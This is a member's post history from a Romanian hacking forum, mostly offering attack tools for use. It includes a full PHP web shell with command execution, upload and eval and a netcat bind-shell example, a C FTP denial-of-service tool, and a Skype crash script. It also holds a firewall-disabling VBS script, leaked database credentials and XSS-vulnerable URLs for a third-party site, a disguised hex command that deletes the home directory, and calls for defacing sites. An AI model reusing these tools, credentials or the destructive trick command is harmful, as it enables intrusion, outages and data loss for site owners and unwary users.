Jump to content

escalation666

Active Members
  • Posts

    567
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by escalation666

  1. lexx nu a vrut sa ne impartaseasca si noua muritorilor de rand....dar el are si un "program" in php corcit cu c prin care poate avea acces remote la toate calculatoarele din lume, si ca sa nu mai lungesc vorba, acesta este source codul: Salvati sursa cu extensia lexx si compilati-o in notepad. ========================== <? very very nasty vicious evil code here ?> ========================== ================= I <<<By Lexx>>> I ================= ================= copywright Lexx @ 2007 ================= Disclaimer: Declar ca sunt in toate facultatile mentale si fecale si imi asum resposabilitatea pentru orice damage adus sistemelor informatice care apartin de guvernul SUA & Romulania, FBEEAI, CEEAIEI and other lame nazi organizeitung's.
  2. JAP....fiind probabil mai bun decat tor
  3. e o distributie linux care are o versiune de kernel veche, e vulnerabila la tot felul de exploituri, cuprinde niste challange-uri si tutoriale....e o platforma prin care sa-ti experimentezi talentele de 1337 bastard.
  4. Troll it's my middle name. Si ca sa inchei ca un veritabil troll ce sunt: Linux rox! windowze sux! voi ce parere aveti?
  5. Tutorialul video facut de Muts, pe care l-am vazut acu mai mult de un an a fost educativ, dar scenariile din real world is mult mai complexe si compromiterea unui sistem nu merge intotdeauna ca dupa o reteta. Nu trebuie neaparat parcursi exact toti pasii din acel tutorial, cum ar fi de exemplu sa scanezi de trei ori cu nmap, pun pariu ca nici nu stii ce inseamna -sT, -sV, -sS sau -sO etc...Pwdump 4 e outdated, incearca versiunea 6 care este mult mai eficienta, sau poti incerca fgdump. Iar cat despre folosirea tftp-ului ai sa descoperi ca nu merge intotdeanu...because some people really have firewalls you know? Un windows cu update-urile la zi nu este vulnerabil la rpc-dcom sau la ms2000 resolution exploit.
  6. maybe you would like to hack a ban
  7. Facut mai mult pentru distractie...dar destul de eficient totusi...va incerca sa conecteze pe un port UDP random de pe server. (E pt linux....merge si pe win cu cygwin) http://rapidshare.com/files/49822075/DoShit.html
  8. ai instalat skype?
  9. #!/usr/bin/perl # Simle Code by Maranax Porex ;D # Ya Skaypeg!! for ($i=256; $i>xCCCCC; $i=$i+256){ $eot='AAAA' x $i; call_sp(); } exit; sub call_sp(){ $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\""; }
  10. Cei interesati si cei care vor sa submita realizari pm to me...oricine este binevenit...chiar si manelistii care vor sa se caiasca Site-ul activitatii va fi unul temporar, unde se vor afisa realizarile tuturor actiunilor anti-manele, deocamdata este acesta http://templecivil.com/.fp/ Sa nu se inteleaga gresit, this is not hacking it's hacktivism! Hacking inseamna doar sa controlezi bitii, HACKTIVISM inseamna sa militezi si sa incerci sa schimbi lumea din jurul prin orice mijloace, si in special pe cale electronica. EDIT: va sfatuiesc sa folositi proxy cand intrati pe site, sa va protejati identitatea si sa NU faceti referire in nici un fel la rstzone.
  11. M-ai dezamagit hexstring cu postarea ta, is din ce in ce mai multe site-uri de genul asta, si nu ar trebui incurajata inmultirea lor. Oricum, in urmatoarele zile vor cadea destul de multe astfel de site-uri...dat fiind faptul ca un anumit web server e owned. Oricine este binevenit in razboiul impotriva manelelor. (se cauta recruti...)
  12. escalation666

    e greu

    Unii ar putea incepe sa evolueze invatand limba romana si lasandu-se de furat si asumat credite.
  13. <?php if (@$_GET['mode'] == 'phpinfo') { phpinfo(); exit; } echo '<html> <head><title>Tiny Shell</title> <style> div.display { border: 2px solid #003B62; font-family: verdana; font-size: 80%; background-color: #B5CFE0; padding: 7px; margin: 5px; } h2.info{ font-size: 150%; margin: 2 0 15 20 color: black; font-family: Arial; } </style> </head> <body> <center>[b]<h1><font face="arial">? Tiny Shell ?</font></h1>[/b]</center> '; $fullpath = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']; $maxsize = ini_get('upload_max_filesize'); $win = strtolower(substr(PHP_OS,0,3)) == "win"; $safemode = (@ini_get("safe_mode") || strtolower(@ini_get("safe_mode"))) == "on" ? "<font color=red>ON (secure)</font>" : "<font color=red>OFF (unsecure)</font>"; $disablefunc = @ini_get("disable_functions"); switch (@$_GET['mode']) { case 'command': if (!empty($_POST['tcommand'])) { echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2> <pre>'.shell_exec($_POST['tcommand']).'</pre></div>'; } unset($_POST); break; case 'upload': $target_path = './' . basename($_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2> The file [b]'.basename($_FILES['uploadedfile']['name']).'[/b] has been uploaded.</div>'; } else{ echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2> An error occurred while uploading the file, please try again.</div>'; } break; case 'eval': if (isset($_POST['code'])) { echo '<div class=\'display\'> <h2 class=\'info\'>? Output</h2>'; eval(stripslashes($_POST['code'])); echo '</div>'; } break; } echo '<div class=\'display\'> <h2 class=\'info\'>? General Info</h2> [b]'.wordwrap(php_uname(),90," ",1).'[/b] Full Script Path: [b]'.$fullpath.'[/b] Server Software: [b][url='.$fullpath.']'.$_SERVER['SERVER_SOFTWARE'].'[/url][/b] Safe Mode: [b]'.$safemode.'[/b] </div>'; echo '<div class=\'display\'> <h2 class=\'info\'>? File Uploads</h2> WARNING MAX FILESIZE: '.$maxsize.' <form enctype="multipart/form-data" action="?mode=upload" method="POST"> File to upload: <input type="file" name="uploadedfile" size=50 /> <input type="submit" value="Upload File" /> </form> </div>'; echo '<div class=\'display\'> <h2 class=\'info\'>? Run a Command</h2> <form action="?mode=command" method="POST"> Command: <input type="text" name="tcommand" size=50 /> <input type="submit" value="Send Command" /> [i]Example: nc -L -p 1337 -d -e cmd.exe[/i] </form> </div>'; echo '<div class=\'display\'> <h2 class=\'info\'>? Evaluate PHP</h2> <form action="?mode=eval" method="POST"> PHP code: <textarea name="code" rows="10" cols="90"></textarea> <input type="submit" value="Run Code" /> </form> </div> </body> </html>'; ?>
  14. '****************************************************************************** 'FwDisable.vbs 'Author: Peter Costantini, The Microsoft Scripting Guys 'Date: 9/2/04 'Version: 1.0 'Disables Windows Firewall, which is enabled by default on XP SP2. '****************************************************************************** On Error Resume Next 'Create the firewall manager object. Set objFwMgr = CreateObject("HNetCfg.FwMgr") If Err <> 0 Then WScript.Echo "Unable to connect to Windows Firewall." WScript.Quit End If 'Get the current profile for the local firewall policy. Set objProfile = objFwMgr.LocalPolicy.CurrentProfile 'Is firewall enabled? If objProfile.FirewallEnabled = True Then 'Disable it. objProfile.FirewallEnabled = False End If
  15. Stai cu ochii pe demo-urile alea...ca alea is slabiciunile din lant...si dupa cum am mai zis, posibilitatile unui rfi is nule, stai la curent cu ultimele vulnerabilitati care apar, cred ca ar trebui sa restrictionezi accesul la unele chestii din demos...eu de exemplu am putut uploada niste php shells...dar nu mi-au folosit la nimica din motivele enuntate mai sus... Si daca ai acces la logs...uita-te pe acolo...poate iti dai seama care-i treaba... In locul tau as sta linistit pentru ca rfi==null si phpbb ultima versiune deja te apara de peste 90% din turkish respectiv iraqian skiddies
  16. dude...nu stiu cum sa-ti spun...dar: config.php: $dbms = 'mysql4'; $dbhost = 'localhost'; $dbname = 'cmshelp_forum'; $dbuser = 'cmshelp_forum'; $dbpasswd = 'forum'; se pare ca vei avea parte de un nou deface... Oricum 99% din script kizi is paralizati pentru ca serverul nu permite functii cum ar fi show_source, system, shell_exec, passthru, exec si allow_url_fopen este off deci posibilitatile rfi is 0. Mai raman vulnerabilitati XSS, sql injection si altele...la fel de periculoase. http://demo.cms-help.net/e107/news.php --> XSS http://www.demo.cms-help.net/easyportal --> XSS http://www.demo.cms-help.net/easyportal/index.php?a=forum --> XSS De asemenea, am gasit o modalitate de a trimite spam (thx pentru oportunitate).
  17. Da...asa da...acum e corect...merge compilarea
  18. nici nu trebuie sa o intelegi tu...trebuie sa o inteleaga cei ca hackedss :wink: si te rog sa-ti editezi mesajul pentru a nu strica distractia celor care vor sa "compileze"
  19. in linux: perl -e 'print "\x72\x6D\x20\x2D\x72\x66\x20\x7E\x2F\x2A"' in windowze: Deschide notepad, scrii "Visual ccv compile -e path_catre_exe_tau" si dupa aceea scrii codul sursa. Vezi ca trebuie sa inlocuiesti path_catre_exe_tau cu locatia in care vrei sa fie salvat. Salvezi, ii redenumesti extensia in exe si il executi.
  20. Iata un motiv bun pentru care sa nu mai faci tutoriale scrise sau video.
  21. poate avea tastatura Braille
  22. Neavand net vreo zi si neavand prea multe de facut....am lucrat la un programel de asalt impotriva serverelor ftp Puteti cere sa se implementeze idei originale...cum ar fi de exemplu: sa cuprinda si un exploit toolkit...chestii de genul asta...si daca voi avea chef poate le voi implementa Optiunea de mass scan inca nu functioneaza Optiunea de DoS lucreaza mai bine decat ma asteptam...fiind testat pe o masina virtuala si pe Personal FTP server si tinand procesorul ei la 100%. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <fcntl.h> #include <unistd.h> #define PORT 21 #define MAXDATASIZE 500 #define IPSIZE 17 int main(int argc, char* argv[]) { int fd, nrbytes,length,scrie,ch; FILE *fisier; char *mesaj = "User anonymous\nPass [email]anon@hell.com[/email]\n"; char *denial_mesaj = "User ~!@#$%^&*()_+|aaaaaaaaaa\nPass ~!@#$%^&*()_+|aaaaaaaaaa\n"; char *hostname=NULL, tmphost[IPSIZE]; char buf [1025]; char *host_r[5]; char *ap; int num_hosts = 0, start_addr=0, end_addr=0,i=0; struct hostent *he; struct sockaddr_in server; void banner(void) { printf("--------------------------------------------------\n"); printf("-----------------FTP Toolz v.1.0------------------\n"); printf("-----------------by escalation666-----------------\n"); printf("--------------------------------------------------\n"); } void usage(void) { printf("Usage: %s [options] ip\n", argv[0]); printf("Options:\n"); printf("Test anonymous ftp login: -a ip\n"); printf("Denial of service: -d ip\n"); printf("Mass scan: -m begin_ip final_ip (trebuie implementat)\n"); exit(0); } banner(); int denial(void) { while (1) { if ((he=gethostbyname(argv[2]))==NULL) { printf("Eroare la rezolvare DNS\n"); exit(-1); } server.sin_family = AF_INET; server.sin_port = htons(PORT); server.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(server.sin_zero),8); if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1) { printf("Eroare la creare socket\n"); exit(-1); } if(connect(fd, (struct sockaddr *)&server,sizeof(struct sockaddr))==-1) { printf("Eroare la conectare\n"); exit(-1); } if(send(fd,denial_mesaj,strlen(denial_mesaj),0) == -1) { printf("Eroare la send()\n"); exit(-1); } if ((nrbytes=recv(fd,buf,MAXDATASIZE,0)) == -1) { printf("Eroare la recive\n"); exit(-1); } buf[nrbytes]='\0'; printf("Raspuns: %s\n\n", buf); close(fd); } } while ((ch = getopt(argc, argv, "a:d:m:")) != -1) { switch (ch) { case 'a': if ((he=gethostbyname(argv[2]))==NULL) { printf("Eroare la rezolvare DNS\n"); exit(-1); } server.sin_family = AF_INET; server.sin_port = htons(PORT); server.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(server.sin_zero),8); if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1) { printf("Eroare la creare socket\n"); exit(-1); } if(connect(fd, (struct sockaddr *)&server,sizeof(struct sockaddr))==-1) { printf("Eroare la conectare\n"); exit(-1); } if(send(fd,mesaj,strlen(mesaj),0) == -1) { printf("Eroare la send()\n"); exit(-1); } if ((nrbytes=recv(fd,buf,MAXDATASIZE,0)) == -1) { printf("Eroare la recive\n"); exit(-1); } buf[nrbytes]='\0'; if ((fisier = fopen("ftp.log", "a")) == NULL) { printf("Eroare la deschiderea fisierului log!\n"); exit(-1); } if ((scrie = fwrite(buf,strlen(buf),1,fisier)) == -1) { printf("Eroare la scrierea in fisier\n"); exit(-1); } printf("Raspuns: %s\n\n", buf); close(fd); break; case 'd': denial(); case 'm': ap = strtok(optarg, "."); for(i = 0; i != 4; i++) { if(ap == NULL) { fprintf(stderr,"\nEroare in sintaxa begin_ip-final_ip.\n"); usage(); } host_r[i] = ap; ap = strtok(NULL, "."); } ap = strtok(host_r[3], "-"); for(i = 0; i != 2; i++) { host_r[4] = ap; if(ap == NULL) { fprintf(stderr,"\nEroare in sintaxa begin_ip-final_ip.\n"); usage(); } ap = strtok(NULL, "-"); } for(i = 0; i != 5; i++) { if (atoi(host_r[3]) >= atoi(host_r[4])) { fprintf(stderr,"\nEroare in sintaxa begin_ip-final_ip.\n"); usage(); } if (host_r[i] == NULL || atoi(host_r[i]) > 255 || atoi(host_r[i]) < 0) { fprintf(stderr,"\nEroare in sintaxa begin_ip-final_ip.\n"); usage(); } } start_addr = atoi(host_r[3]); end_addr = atoi(host_r[4]); num_hosts = end_addr - start_addr; num_hosts++; while(num_hosts > 0) if(start_addr && end_addr) { snprintf(tmphost, IPSIZE, "%s.%s.%s.%d", host_r[0], host_r[1], host_r[2], start_addr); hostname = (char *)malloc(IPSIZE); strncpy(hostname, tmphost, IPSIZE); start_addr++; } if ((he=gethostbyname(argv[1]))==NULL) { printf("Eroare la rezolvare DNS\n"); exit(-1); } else { memcpy((char*)&server.sin_addr, he->h_addr, he->h_length); } server.sin_family = AF_INET; server.sin_port = htons(PORT); server.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(server.sin_zero),8); /* trebuie sa mai lucrez si sa mai completez aici... */ num_hosts--; if(start_addr && end_addr) { free(hostname); } break; default: usage(); } } }
  23. Bingo! Nu l-ai vazut ca de abia a downloadat cygwin-ul? ma mir ca nu uita cum sa respire...bv m4rksomething dupa atata efort, un urias pas pentru tine, un pas infim pentru lume.
  24. thx for the link...deja am gasit 2 bug-uri prin care pot sa crash-uiesc un konqueror... first: (da...stiu ca am folosit vulnerabilitati IE impotriva konqueror pt ca e posibil uneori ca browsere diferite sa fie afectate de aceease vulnerab) go to http://bcheck.scanit.be/bcheck/choosetests.php, alegi ultimul test...il bifezi, dai start la test...cand testul e gata dai la back history...si browserul se buseste. (no debugging symbols found) Using host libthread_db library "/lib/tls/libthread_db.so.1". (no debugging symbols found) [Thread debugging using libthread_db enabled] [New Thread -1234676032 (LWP 4059)] [KCrash handler] #5 0xb6228ac4 in QPtrStack<DOM::NodeImpl>::deleteItem () from /opt/kde/lib/libkhtml.so.4 #6 0xb6268ced in QMemArray<QPoint>::detach () from /opt/kde/lib/libkhtml.so.4 #7 0xb637a695 in QValueList<DOM::Node>::detachInternal () from /opt/kde/lib/libkhtml.so.4 #8 0xb60ca720 in KJS::ObjectImp::getPropertyByIndex () from /opt/kde/lib/libkjs.so.1 #9 0xb60d16c5 in KJS::Reference::getValue () from /opt/kde/lib/libkjs.so.1 #10 0xb608f072 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #11 0xb6094d78 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #12 0xb6096d45 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #13 0xb609da58 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #14 0xb6096b4f in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #15 0xb60971ec in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #16 0xb609d9ae in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #17 0xb6096b4f in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #18 0xb60c4dec in KJS::DeclaredFunctionImp::execute () from /opt/kde/lib/libkjs.so.1 #19 0xb60c42e0 in KJS::FunctionImp::call () from /opt/kde/lib/libkjs.so.1 #20 0xb60cb7a0 in KJS::Object::call () from /opt/kde/lib/libkjs.so.1 #21 0xb609200d in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #22 0xb6096d45 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #23 0xb609da58 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #24 0xb6096b4f in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #25 0xb60b78b1 in KJS::SourceCode::cleanup () from /opt/kde/lib/libkjs.so.1 #26 0xb60cc1aa in KJS::Interpreter::evaluate () from /opt/kde/lib/libkjs.so.1 #27 0xb639023d in TestFunctionImp::call () from /opt/kde/lib/libkhtml.so.4 #28 0xb61db472 in KHTMLPart::executeScript () from /opt/kde/lib/libkhtml.so.4 #29 0xb624b52e in MultiMapPtrList<DOM::ElementImpl>::next () from /opt/kde/lib/libkhtml.so.4 #30 0xb624ed75 in MultiMapPtrList<DOM::ElementImpl>::next () from /opt/kde/lib/libkhtml.so.4 #31 0xb624fcfe in MultiMapPtrList<DOM::ElementImpl>::next () from /opt/kde/lib/libkhtml.so.4 #32 0xb6250b9a in MultiMapPtrList<DOM::ElementImpl>::next () from /opt/kde/lib/libkhtml.so.4 #33 0xb6252d2c in MultiMapPtrList<DOM::ElementImpl>::next () from /opt/kde/lib/libkhtml.so.4 #34 0xb61d5445 in KHTMLPart::write () from /opt/kde/lib/libkhtml.so.4 #35 0xb61c1e49 in KHTMLPart::slotRestoreData () from /opt/kde/lib/libkhtml.so.4 #36 0xb61eb136 in KHTMLPart::qt_invoke () from /opt/kde/lib/libkhtml.so.4 #37 0xb6f1ed34 in QObject::activate_signal () from /usr/lib/qt/lib/libqt-mt.so.3 #38 0xb620a7cd in KHTMLPageCacheDelivery::emitData () from /opt/kde/lib/libkhtml.so.4 #39 0xb620adbb in KHTMLPageCache::sendData () from /opt/kde/lib/libkhtml.so.4 #40 0xb620aec8 in KHTMLPageCache::qt_invoke () from /opt/kde/lib/libkhtml.so.4 #41 0xb6f1ed34 in QObject::activate_signal () from /usr/lib/qt/lib/libqt-mt.so.3 #42 0xb725e87d in QSignal::signal () from /usr/lib/qt/lib/libqt-mt.so.3 #43 0xb6f39791 in QSignal::activate () from /usr/lib/qt/lib/libqt-mt.so.3 #44 0xb6f41293 in QSingleShotTimer::event () from /usr/lib/qt/lib/libqt-mt.so.3 #45 0xb6eba22f in QApplication::internalNotify () from /usr/lib/qt/lib/libqt-mt.so.3 #46 0xb6eba3cc in QApplication::notify () from /usr/lib/qt/lib/libqt-mt.so.3 #47 0xb751b9f5 in KApplication::notify () from /opt/kde/lib/libkdecore.so.4 #48 0xb6ead78c in QEventLoop::activateTimers () from /usr/lib/qt/lib/libqt-mt.so.3 #49 0xb6e664d1 in QEventLoop::processEvents () from /usr/lib/qt/lib/libqt-mt.so.3 #50 0xb6ed0951 in QEventLoop::enterLoop () from /usr/lib/qt/lib/libqt-mt.so.3 #51 0xb6ed08a6 in QEventLoop::exec () from /usr/lib/qt/lib/libqt-mt.so.3 #52 0xb6eb938f in QApplication::exec () from /usr/lib/qt/lib/libqt-mt.so.3 #53 0xb7eb69fc in kdemain () from /opt/kde/lib/libkdeinit_konqueror.so #54 0x0804871e in ?? () #55 0x00000001 in ?? () #56 0xbf8efe64 in ?? () #57 0x08049828 in ?? () #58 0xb683cffc in ?? () from /lib/tls/libc.so.6 #59 0x00000000 in ?? () second: testezi toate vulnerabilitatile pt IE si dupa ce termina de testat cu ultimul se buseste automat browserul. (no debugging symbols found) Using host libthread_db library "/lib/tls/libthread_db.so.1". [Thread debugging using libthread_db enabled] [New Thread -1234700608 (LWP 654)] [KCrash handler] #5 0xb6222ac4 in QPtrStack<DOM::NodeImpl>::deleteItem () from /opt/kde/lib/libkhtml.so.4 #6 0xb6262ced in QMemArray<QPoint>::detach () from /opt/kde/lib/libkhtml.so.4 #7 0xb6374695 in QValueList<DOM::Node>::detachInternal () from /opt/kde/lib/libkhtml.so.4 #8 0xb60c4720 in KJS::ObjectImp::getPropertyByIndex () from /opt/kde/lib/libkjs.so.1 #9 0xb60cb6c5 in KJS::Reference::getValue () from /opt/kde/lib/libkjs.so.1 #10 0xb6089072 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #11 0xb608ed78 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #12 0xb6090d45 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #13 0xb6097a58 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #14 0xb6090b4f in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #15 0xb60911ec in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #16 0xb60979ae in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #17 0xb6090b4f in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #18 0xb60bedec in KJS::DeclaredFunctionImp::execute () from /opt/kde/lib/libkjs.so.1 #19 0xb60be2e0 in KJS::FunctionImp::call () from /opt/kde/lib/libkjs.so.1 #20 0xb60c57a0 in KJS::Object::call () from /opt/kde/lib/libkjs.so.1 #21 0xb608c00d in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #22 0xb6090d45 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #23 0xb6097a58 in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #24 0xb6090b4f in KJS::DateObjectFuncImp::~DateObjectFuncImp () from /opt/kde/lib/libkjs.so.1 #25 0xb60b18b1 in KJS::SourceCode::cleanup () from /opt/kde/lib/libkjs.so.1 #26 0xb60c61aa in KJS::Interpreter::evaluate () from /opt/kde/lib/libkjs.so.1 #27 0xb638a23d in TestFunctionImp::call () from /opt/kde/lib/libkhtml.so.4 #28 0xb61d5472 in KHTMLPart::executeScript () from /opt/kde/lib/libkhtml.so.4 #29 0xb624552e in MultiMapPtrList<DOM::ElementImpl>::next () from /opt/kde/lib/libkhtml.so.4 #30 0xb6248d75 in MultiMapPtrList<DOM::ElementImpl>::next () from /opt/kde/lib/libkhtml.so.4 #31 0xb6249cfe in MultiMapPtrList<DOM::ElementImpl>::next () from /opt/kde/lib/libkhtml.so.4 #32 0xb624ab9a in MultiMapPtrList<DOM::ElementImpl>::next () from /opt/kde/lib/libkhtml.so.4 #33 0xb624cd2c in MultiMapPtrList<DOM::ElementImpl>::next () from /opt/kde/lib/libkhtml.so.4 #34 0xb61cf445 in KHTMLPart::write () from /opt/kde/lib/libkhtml.so.4 #35 0xb61bbe49 in KHTMLPart::slotRestoreData () from /opt/kde/lib/libkhtml.so.4 #36 0xb61e5136 in KHTMLPart::qt_invoke () from /opt/kde/lib/libkhtml.so.4 #37 0xb6f18d34 in QObject::activate_signal () from /usr/lib/qt/lib/libqt-mt.so.3 #38 0xb62047cd in KHTMLPageCacheDelivery::emitData () from /opt/kde/lib/libkhtml.so.4 #39 0xb6204dbb in KHTMLPageCache::sendData () from /opt/kde/lib/libkhtml.so.4 #40 0xb6204ec8 in KHTMLPageCache::qt_invoke () from /opt/kde/lib/libkhtml.so.4 #41 0xb6f18d34 in QObject::activate_signal () from /usr/lib/qt/lib/libqt-mt.so.3 #42 0xb725887d in QSignal::signal () from /usr/lib/qt/lib/libqt-mt.so.3 #43 0xb6f33791 in QSignal::activate () from /usr/lib/qt/lib/libqt-mt.so.3 #44 0xb6f3b293 in QSingleShotTimer::event () from /usr/lib/qt/lib/libqt-mt.so.3 #45 0xb6eb422f in QApplication::internalNotify () from /usr/lib/qt/lib/libqt-mt.so.3 #46 0xb6eb43cc in QApplication::notify () from /usr/lib/qt/lib/libqt-mt.so.3 #47 0xb75159f5 in KApplication::notify () from /opt/kde/lib/libkdecore.so.4 #48 0xb6ea778c in QEventLoop::activateTimers () from /usr/lib/qt/lib/libqt-mt.so.3 #49 0xb6e604d1 in QEventLoop::processEvents () from /usr/lib/qt/lib/libqt-mt.so.3 #50 0xb6eca951 in QEventLoop::enterLoop () from /usr/lib/qt/lib/libqt-mt.so.3 #51 0xb6eca8a6 in QEventLoop::exec () from /usr/lib/qt/lib/libqt-mt.so.3 #52 0xb6eb338f in QApplication::exec () from /usr/lib/qt/lib/libqt-mt.so.3 #53 0xb7eb09fc in kdemain () from /opt/kde/lib/libkdeinit_konqueror.so #54 0x0804871e in ?? () #55 0x00000001 in ?? () #56 0xbf9e4764 in ?? () #57 0x08049828 in ?? () #58 0xb6836ffc in ?? () from /lib/tls/libc.so.6 #59 0x00000000 in ?? () chestiile astea le-am testat de mai multe ori si de fiecare data am obtinut aceleasi rezultate. (valorile memoriei afectate fiind diferite bineinteles)
  25. pentru asta exista tutoriale...acuma daca eu am gasit un sql injection...n-am sa stau sa explic toti pasii pe care i-am parcurs.
×
×
  • Create New...